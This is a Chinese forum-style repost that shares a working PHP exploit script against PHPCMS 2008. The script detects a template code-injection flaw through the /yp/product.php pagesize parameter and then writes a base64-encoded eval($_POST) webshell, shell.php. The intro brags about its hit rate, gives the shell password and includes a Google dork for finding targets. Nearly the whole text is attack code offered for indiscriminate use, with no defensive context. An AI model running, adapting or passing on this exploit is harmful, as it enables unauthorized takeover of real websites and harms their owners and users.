作者:百变睛灵_345 | 来源:互联网 | 2017-11-10 19:02
玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为cEXP:#!usrbinphp?phpprint_r+---------------------------------------------------------------------------+PHPCMSRemoteCodeInjectGetShellExploitGoogleDork:Powe
玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c
EXP:
#!/usr/bin/php
print_r('
+---------------------------------------------------------------------------+
PHPCMS Remote Code Inject GetShell Exploit
Google Dork:Powered by Phpcms 2008
code by secr
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
print_r(&#39;
+---------------------------------------------------------------------------+
Usage: php &#39;.$argv[0].&#39; host path
host: target server (ip/hostname)
path: path to phpcms
Example:
php &#39;.$argv[0].&#39; localhost /phpcms/
+---------------------------------------------------------------------------+
&#39;);
exit;
}
error_reporting(0);
set_time_limit(0);
$host = $argv[1];
$path = $argv[2];
$exp =&#39;/yp/product.php?view_type=1&catid=&pagesize={${fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}&areaname=0&order=&#39;;
//检测是否存在漏洞
echo "[+] Try to determine the Bug....n";
$returnstr=httpRequestGET(&#39;/yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order=&#39;);
if(preg_match(&#39;/(php.ini)/i&#39;,$returnstr)){
echo("[+] This site has Bug!We Will Be Try To Exploit Itn");
}
else
{
exit("[-] Exploit Failed! This site has No Bug!n");
}
//如果存在漏洞,就发送EXP Getshell
echo "[+] Try to create webshell....n";
httpRequestGET($exp);
$content=httpRequestGET("/yp/shell.php");
//发送EXP后,在获取的shell检测时候页面里有OK字符,如果有,则GETWebshell成功。
//print_r($content);
if(strpos($content,&#39;ok&#39;)){
echo "[+] Expoilt successfully....n";
echo "[+] Webshell:http://$host{$path}yp/shell.phpn";
}else{
exit("[-] Exploit Failed!n");
}
//模拟POST或者GET请求函数。
function httpRequestGET($url){
global $host, $path;
$method=$method?&#39;POST&#39;:&#39;GET&#39;;
$payload = $method." ".$path.$url." HTTP/1.1rn";
$payload .= "Accept: */*rn";
$payload .= "User-Agent: Payb-Agentrn";
$payload .= "Host: " . $host . "rn";
$payload .= "Connection: Closernrn";
$fp = fsockopen(gethostbyname($host), 80);
if (!$fp) {
echo &#39;No response from &#39;.$host; die;
}
fputs($fp, $payload);
$resp = &#39;&#39;;
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
|